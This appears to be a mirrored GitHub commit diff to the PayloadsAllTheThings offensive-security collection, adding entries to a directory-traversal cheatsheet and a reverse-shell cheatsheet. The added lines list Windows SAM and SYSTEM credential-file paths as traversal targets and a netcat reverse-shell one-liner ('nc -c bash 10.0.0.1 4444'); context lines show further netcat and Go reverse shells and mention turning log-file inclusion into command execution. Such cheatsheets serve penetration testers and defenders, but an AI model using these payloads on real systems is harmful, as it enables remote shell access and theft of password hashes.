mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-01 07:57:25 +00:00
Merge pull request #106 from Hi15358/master
Update Reverse Shell Cheatsheet.md and Directory Traversal
This commit is contained in:
commit
b7fdf8aa3f
@ -144,6 +144,8 @@ c:/unattend.txt
|
|||||||
c:/unattend.xml
|
c:/unattend.xml
|
||||||
c:/unattended.txt
|
c:/unattended.txt
|
||||||
c:/unattended.xml
|
c:/unattended.xml
|
||||||
|
c:/windows/repair/sam
|
||||||
|
c:/windows/repair/system
|
||||||
```
|
```
|
||||||
|
|
||||||
The following log files are controllable and can be included with an evil payload to achieve a command execution
|
The following log files are controllable and can be included with an evil payload to achieve a command execution
|
||||||
@ -164,4 +166,4 @@ The following log files are controllable and can be included with an evil payloa
|
|||||||
## References
|
## References
|
||||||
|
|
||||||
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
||||||
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
|
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
|
||||||
|
@ -129,6 +129,7 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","
|
|||||||
```bash
|
```bash
|
||||||
nc -e /bin/sh [IPADDR] [PORT]
|
nc -e /bin/sh [IPADDR] [PORT]
|
||||||
nc.traditional -e /bin/bash 10.0.0.1 4444
|
nc.traditional -e /bin/bash 10.0.0.1 4444
|
||||||
|
nc -c bash 10.0.0.1 4444
|
||||||
```
|
```
|
||||||
|
|
||||||
### Netcat OpenBsd
|
### Netcat OpenBsd
|
||||||
|
Loading…
Reference in New Issue
Block a user